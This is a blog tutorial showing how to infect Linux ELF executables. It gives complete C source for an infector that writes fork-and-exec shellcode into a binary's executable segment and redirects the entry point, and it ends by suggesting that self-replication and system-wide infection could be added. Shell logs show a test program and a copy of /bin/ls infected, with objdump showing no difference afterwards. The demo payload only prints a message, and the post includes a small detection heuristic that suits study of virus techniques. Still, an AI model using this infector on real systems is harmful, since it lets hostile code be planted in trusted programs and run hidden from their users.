Modifying the ELF executable entry point to infect a program

In the previous article, when introducing how to inject code into a Linux kernel module, I mentioned that it is easy to "modify the entry of an ELF or PE file so that it jumps to your own logic".

Is it really easy? Yes, it really is, and this article demonstrates it.

Remember the Panda Burning Incense virus? Early computer viruses, including that one, injected their own code in this way to replicate themselves. They did not necessarily modify the entry address, but they must have modified the ELF/PE file.

To modify an ELF file, we first need to understand its structure, which takes only about 10 minutes to skim. This article will not spend long introducing ELF concepts.

The <elf.h> header file already contains the data structures and constants we need to modify an ELF executable, so we can simply use them.
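
As a small illustration of what <elf.h> offers, the sketch below reads the entry address out of an ELF64 header that has already been loaded into memory. The function name elf64_entry is made up for this example; the types and constants (Elf64_Ehdr, ELFMAG, SELFMAG, EI_CLASS, ELFCLASS64) come from <elf.h>.

```c
#include <elf.h>
#include <stddef.h>
#include <string.h>

/* Copy the ELF64 header out of an in-memory file image and return its
 * entry address through *entry. Returns 0 on success, -1 if the buffer
 * is too small or is not a 64-bit ELF image.
 * (elf64_entry is a hypothetical helper name, not part of <elf.h>.) */
int elf64_entry(const unsigned char *image, size_t len, Elf64_Addr *entry)
{
    Elf64_Ehdr ehdr;

    if (len < sizeof(ehdr))
        return -1;
    memcpy(&ehdr, image, sizeof(ehdr));      /* copy to avoid alignment issues */
    if (memcmp(ehdr.e_ident, ELFMAG, SELFMAG) != 0)
        return -1;                           /* missing "\177ELF" magic */
    if (ehdr.e_ident[EI_CLASS] != ELFCLASS64)
        return -1;                           /* 32-bit or invalid class */
    *entry = ehdr.e_entry;
    return 0;
}
```

Called on the bytes of a mapped executable, it returns the same e_entry field that the rest of this article reads and rewrites.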

The example in this article is very simple: it infects an existing ELF executable. First, here is the code of that executable:

// hello.c
int main()
{
	printf("aaaaaaaaaaaaa\n");
}

We compile it into a hello executable.

Next, we try to use another program to modify its entry. The new entry logic is as follows:

if (fork() == 0) {
	exec("/bin/aa");
} else {
	goto orig_entry;
}
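
The exec in the snippet above is shorthand rather than a real libc function. Written with actual calls, the same "child runs another program, parent carries on" pattern might look like the sketch below. The name spawn_and_continue is hypothetical, and the argv/envp arrays are my own choice for the example.

```c
#include <sys/types.h>
#include <unistd.h>

/* Fork; the child replaces itself with the program at `path`, while the
 * parent returns at once and carries on with its own work.
 * Returns the child's pid in the parent, or -1 if fork() failed.
 * (spawn_and_continue is a hypothetical name used for illustration.) */
pid_t spawn_and_continue(const char *path)
{
    pid_t pid = fork();

    if (pid == 0) {
        char *const argv[] = { (char *)path, NULL };
        char *const envp[] = { NULL };

        execve(path, argv, envp);
        _exit(127);              /* only reached if execve() failed */
    }
    return pid;
}
```

Because the parent does not wait for the child, the two run concurrently and their output can appear in either order.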

We certainly can't inject C code directly into an ELF file, just as we can't inject ramen soup into a blood vessel. So we need the machine code for the above logic.

How do we get the machine code?

We write the above C logic by hand as inline assembly and compile it into an executable. With objdump, we can then read off the machine code:

void func()
{
	asm ("xor %rax, %rax;\n"
		 "mov $0x39, %al;\n" // System call number of fork
		 "syscall;\n"
		 "test %eax, %eax;\n"
		 "je exec;\n" // The child (fork returned 0) goes on to exec
		 "nop; nop; nop; nop; nop;\n" // 5-byte placeholder for jmp orig, filled in at run time
		 "exec:\n"
		 "mov $0x61612f6e69622f, %r11;\n" // "/bin/aa" packed into one 64-bit value
		 "push %r11;\n"
		 "mov $0x0, %edx;\n"
		 "mov $0x0, %rsi;\n"
		 "mov %rsp, %rdi;\n"
		 "mov $0x3b, %eax;\n"  // System call number of execve
		 "syscall;\n"
		 "orig:\n"
		);
}

void main()
{
	func();
}

After compiling, objdump -d gives us the following instructions:

00000000004004cd <func>:
  4004cd:   55                      push   %rbp
  4004ce:   48 89 e5                mov    %rsp,%rbp
  4004d1:   48 31 c0                xor    %rax,%rax
  4004d4:   b0 39                   mov    $0x39,%al
  4004d6:   0f 05                   syscall
  4004d8:   85 c0                   test   %eax,%eax
  4004da:   74 05                   je     4004e1 <exec>
  4004dc:   90                      nop
  4004dd:   90                      nop
  4004de:   90                      nop
  4004df:   90                      nop
  4004e0:   90                      nop

00000000004004e1 <exec>:
  4004e1:   49 bb 2f 62 69 6e 2f    movabs $0x61612f6e69622f,%r11
  4004e8:   61 61 00
  4004eb:   41 53                   push   %r11
  4004ed:   ba 00 00 00 00          mov    $0x0,%edx
  4004f2:   48 c7 c6 00 00 00 00    mov    $0x0,%rsi
  4004f9:   48 89 e7                mov    %rsp,%rdi
  4004fc:   b8 3b 00 00 00          mov    $0x3b,%eax
  400501:   0f 05                   syscall

OK, after tidying this up, we get the following stub_code array:

unsigned char stub_code[] =
				"\x48\x31\xc0"									// xor    %rax,%rax
                "\xb0\x39"										// mov    $0x39,%al
                "\x0f\x05"										// syscall
				"\x85\xc0"										// test   %eax,%eax
				"\x74\x05"										// je     40070c <__FRAME_END__+0x14>
				"\x00\x00\x00\x00\x00" // index is 11			// jmpq   400430 <_start>
				"\x49\xbb\x2f\x62\x69\x6e\x2f\x61\x61\x00"		// movabs $0x61612f6e69622f,%r11
				"\x41\x53"										// push   %r11
				"\xba\x00\x00\x00\x00"							// mov    $0x0,%edx
				"\x48\xc7\xc6\x00\x00\x00\x00"					// mov    $0x0,%rsi
				"\x48\x89\xe7"									// mov    %rsp,%rdi
				"\xb8\x3b\x00\x00\x00"							// mov    $0x3b,%eax
				"\x0f\x05";										// syscall
#define RELJMP	11

The raw material is ready; all that remains is to inject the bytes of the above array into the hello program.

Before implementing the injection, two points need explaining.

First, note the instructions above:

movabs $0x61612f6e69622f,%r11
push   %r11
mov    %rsp,%rdi

According to the x86_64 calling convention, the rdi register holds the first argument of the exec system call, that is, "/bin/aa". Preparing that argument is troublesome because it requires a string, and strings are normally stored in a separate section of the ELF file. I don't want to go to the trouble of injecting a string as well; I want to inject a single piece of code and nothing else. So I use a trick here:

// Encode the string as a 64-bit number.
char name[8] = {'/', 'b', 'i', 'n', '/', 'a', 'a', 0};
char *pname;
unsigned long pv = *(unsigned long *)&name[0];
// pv is 0x61612f6e69622f: read from the high byte down it spells "aa/nib/",
// but stored in little-endian order it is "/bin/aa".
pname = (char *)&pv; // pname now points to "/bin/aa"
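
The same value can be derived without relying on the byte order of the machine doing the encoding. The sketch below builds it with shifts. pack_le8 is a name I made up, and the approach only suits strings of at most 7 characters, so that the terminating NUL still fits into the 8 bytes.

```c
#include <stdint.h>

/* Pack up to 8 bytes of `s` into a 64-bit value so that, when the value
 * is stored in little-endian order, the bytes spell the string again.
 * Bytes after the terminating NUL stay zero.
 * (pack_le8 is a hypothetical helper name.) */
uint64_t pack_le8(const char *s)
{
    uint64_t v = 0;

    for (int i = 0; i < 8 && s[i] != '\0'; i++)
        v |= (uint64_t)(unsigned char)s[i] << (8 * i);
    return v;
}
```

For "/bin/aa" this gives 0x61612f6e69622f, the immediate used in the movabs instruction.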

At the same time, I use push to place this number on the stack, so that rsp points to it. Then only the following two instructions are needed to make rdi, the first argument of exec, point to the string:

push   %r11
mov    %rsp,%rdi

This avoids all the work of storing and handling a separate string. Fun, isn't it? Before going on, I should reveal what /bin/aa is. It is very simple; it just prints one sentence:

#include <stdio.h>

int main()
{
    printf("rush tighten beat electric discourse\n"); // means "call now"
}

The effect we want is that every infected program (in our case, hello) prints the "call now" sentence when it runs.

OK, let's move on.

It's time to show the code that modifies the entry. As always, I can't guarantee that this code is completely bug free, but it is simple enough and it works. For a demonstration, simplicity matters most.

The code is as follows:

#include <stdio.h>
#include <fcntl.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>
#include <elf.h>

unsigned char stub_code[] =
				"\x48\x31\xc0"									// xor    %rax,%rax
				"\xb0\x39"										// mov    $0x39,%al
				"\x0f\x05"										// syscall
				"\x85\xc0"										// test   %eax,%eax
				"\x74\x05"										// je     40070c <__FRAME_END__+0x14>
				"\x00\x00\x00\x00\x00" // index is 11			// jmpq   400430 <_start>
				"\x49\xbb\x2f\x62\x69\x6e\x2f\x61\x61\x00"		// movabs $0x61612f6e69622f,%r11
				"\x41\x53"										// push   %r11
				"\xba\x00\x00\x00\x00"							// mov    $0x0,%edx
				"\x48\xc7\xc6\x00\x00\x00\x00"					// mov    $0x0,%rsi
				"\x48\x89\xe7"									// mov    %rsp,%rdi
				"\xb8\x3b\x00\x00\x00"							// mov    $0x3b,%eax
				"\x0f\x05";										// syscall
#define RELJMP	11

int main(int argc, char **argv)
{
	int fd, i;
	unsigned char *base;
	unsigned int size, *off, offs;
	unsigned long stub, orig;
	unsigned long clen = sizeof(stub_code);
	Elf64_Ehdr *ehdr;
	Elf64_Phdr *phdrs;

	// This is an e9 jmp rel32 instruction
	stub_code[RELJMP] = 0xe9;
	off = (unsigned int *)&stub_code[RELJMP + 1];

	fd = open(argv[1], O_RDWR);
	size = lseek(fd, 0, SEEK_END);
	base = mmap(NULL, size, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);

	ehdr = (Elf64_Ehdr *) base;
	phdrs = (Elf64_Phdr *) &base[ehdr->e_phoff];
	orig = ehdr->e_entry;

	for (i = 0; i < ehdr->e_phnum; ++i) {
		if (phdrs[i].p_type == PT_LOAD && phdrs[i].p_flags == (PF_R|PF_X)) {
			// It is assumed that there is only one executable program header
			stub = phdrs[i].p_vaddr + phdrs[i].p_filesz;
			ehdr->e_entry = (Elf64_Addr)stub;
			// In order to jump back to the original entry, the relative offset needs to be calculated here
			offs = orig - (stub + RELJMP) - 5;
			// The pending rel32 is finally assigned
			*off = offs;

			memcpy(base + phdrs[i].p_offset + phdrs[i].p_filesz, stub_code, clen);
			printf("fsie:%d   %08x\n", phdrs[i].p_filesz, ehdr->e_entry);

			phdrs[i].p_filesz += clen;
			phdrs[i].p_memsz += clen;
			break;
		}
    }
    munmap(base, size);
}
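
The offset arithmetic inside the loop can be isolated in a small helper, sketched below. jmp_rel32 is a hypothetical name. It assumes the jump and its target lie within 2 GiB of each other, which is all that an e9 rel32 jump can reach.

```c
#include <stdint.h>

/* Displacement for a 5-byte `e9 rel32` jump located at jmp_addr that
 * should land on target. The CPU adds rel32 to the address of the
 * instruction that follows the jump, hence the "+ 5".
 * (jmp_rel32 is a hypothetical helper name.) */
int32_t jmp_rel32(uint64_t jmp_addr, uint64_t target)
{
    return (int32_t)(uint32_t)(target - (jmp_addr + 5));
}
```

With the values from the hello run in this article (stub at 0x4006fc, so the jump sits at 0x4006fc + 11 = 0x400707, and the original entry is 0x400430), the result is -0x2dc, i.e. 0xfffffd24. Stored in little-endian order that is 24 fd ff ff, the operand bytes of the jmpq that appears in the disassembly of the infected file.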

Let's go! Come on!

[root@localhost modentry]# cat test-1
gcc hello.c -o hello
gcc modelf.c -o modelf
./modelf ./hello
[root@localhost modentry]# ./test-1
hello.c: In function 'main':
hello.c:3:2: warning: incompatible implicit declaration of built-in function 'printf' [enabled by default]
  printf("aaaaaaaaaaaaa\n");
  ^
fsie:1788   004006fc
[root@localhost modentry]# ./hello
aaaaaaaaaaaaa
rush tighten beat electric discourse
[root@localhost modentry]# ./hello
aaaaaaaaaaaaa
[root@localhost modentry]# rush tighten beat electric discourse

[root@localhost modentry]# ./hello
aaaaaaaaaaaaa
[root@localhost modentry]# rush tighten beat electric discourse

Successful infection!

Now let's infect a system command and see what happens:

[root@localhost modentry]# cp /bin/ls ./
[root@localhost modentry]# ./modelf ./ls
fsie:103980   0041962c
[root@localhost modentry]# ./ls
hello  hello.c  ls  modelf  modelf.c	nop  pwd  test-1 
rush tighten beat electric discourse

Successful infection!

The infection code above is very simple. You may think it is wrong, and yes, it is, because it simply hopes that there is free space after the executable segment. I haven't even adjusted the section sizes or the file size. As a result, the file size is the same before and after infection, and there is a welcome side effect:

[root@localhost modentry]# /bin/ls
hello  hello.c  ls  modelf  modelf.c	nop  pwd  test-1  
[root@localhost modentry]# objdump -D /bin/ls >./lsdump1
[root@localhost modentry]# ./ls
hello  hello.c  ls  lsdump1  modelf  modelf.c  nop  pwd  test-1
rush tighten beat electric discourse
[root@localhost modentry]# objdump -D ./ls >./lsdump2
[root@localhost modentry]#
[root@localhost modentry]# diff lsdump1 lsdump2
2c2
< /bin/ls:      file format elf64-x86-64
---
> ./ls:      file format elf64-x86-64

We see that objdump shows no difference. If we improved the program, the infection would actually be easier to spot: if I add code to modelf.c that adjusts the section sizes, then objdump on the infected executable additionally shows the following:

00000000004006f8 <__FRAME_END__>:
  4006f8:   00 00                   add    %al,(%rax)
  4006fa:   00 00                   add    %al,(%rax)
  4006fc:   48 31 c0                xor    %rax,%rax
  4006ff:   b0 39                   mov    $0x39,%al
  400701:   0f 05                   syscall
  400703:   85 c0                   test   %eax,%eax
  400705:   74 05                   je     40070c <__FRAME_END__+0x14>
  400707:   e9 24 fd ff ff          jmpq   400430 <_start>
  40070c:   49 bb 2f 62 69 6e 2f    movabs $0x61612f6e69622f,%r11
  400713:   61 61 00
  400716:   41 53                   push   %r11
  400718:   ba 00 00 00 00          mov    $0x0,%edx
  40071d:   48 c7 c6 00 00 00 00    mov    $0x0,%rsi
  400724:   48 89 e7                mov    %rsp,%rdi
  400727:   b8 3b 00 00 00          mov    $0x3b,%eax
  40072c:   0f 05                   syscall

Look carefully: isn't this the code we injected?
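
From the defender's side, the fact that the section headers are left untouched suggests a simple heuristic: in a file modified this way, the entry point appears to lie outside every section. The sketch below checks for that. entry_in_section is a hypothetical name, and the check is only a hint, not a reliable detector. Binaries without section headers yield -1.

```c
#include <elf.h>
#include <stddef.h>
#include <string.h>

/* Returns 1 if e_entry lies inside some allocated section, 0 if it lies
 * in none, and -1 if the buffer is not a usable ELF64 image with
 * section headers. (entry_in_section is a hypothetical helper name.) */
int entry_in_section(const unsigned char *image, size_t len)
{
    Elf64_Ehdr eh;

    if (len < sizeof(eh))
        return -1;
    memcpy(&eh, image, sizeof(eh));
    if (memcmp(eh.e_ident, ELFMAG, SELFMAG) != 0 ||
        eh.e_ident[EI_CLASS] != ELFCLASS64)
        return -1;
    if (eh.e_shentsize != sizeof(Elf64_Shdr) || eh.e_shoff > len ||
        (len - eh.e_shoff) / sizeof(Elf64_Shdr) < eh.e_shnum)
        return -1;                   /* section table missing or truncated */

    for (size_t i = 0; i < eh.e_shnum; i++) {
        Elf64_Shdr sh;

        memcpy(&sh, image + eh.e_shoff + i * sizeof(sh), sizeof(sh));
        if (!(sh.sh_flags & SHF_ALLOC))
            continue;                /* section is not loaded into memory */
        if (eh.e_entry >= sh.sh_addr && eh.e_entry - sh.sh_addr < sh.sh_size)
            return 1;
    }
    return 0;
}
```

A result of 0 means the entry address is covered by no section, which is unusual for a binary produced by a normal toolchain and worth a closer look.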

Finally, I want to explain why the stub calls exec to run an external program. Wouldn't it be more direct to put the code in the stub itself?

Yes, I know that, but:

  1. It's just a demo program. I don't want to cram too much complexity into a single stub.
  2. Because libc has not been initialized at the entry point, calling library functions such as printf there may cause problems.
  3. Printing from the stub code would make the machine code long and complex.

However, the point has been demonstrated. If I were willing to go to the trouble, I could put the following logic into the stub code:

  • Scan all executable files on the system and inject each one with the code shown in this article.
  • Add a self-copying function to the code.

Tags: Linux

Posted on Fri, 08 May 2020 20:04:59 -0700 by petrb